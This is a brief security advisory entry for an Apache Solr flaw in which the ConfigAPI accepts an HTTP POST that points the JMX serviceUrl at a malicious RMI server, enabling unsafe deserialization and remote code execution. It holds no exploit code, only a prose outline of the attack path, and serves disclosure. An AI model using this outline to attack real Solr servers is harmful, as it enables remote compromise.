ASA-2019-00126 – Apache Solr: Deserialization of untrusted data via jmx.serviceUrl

ConfigAPI allows to configure Solr's JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side.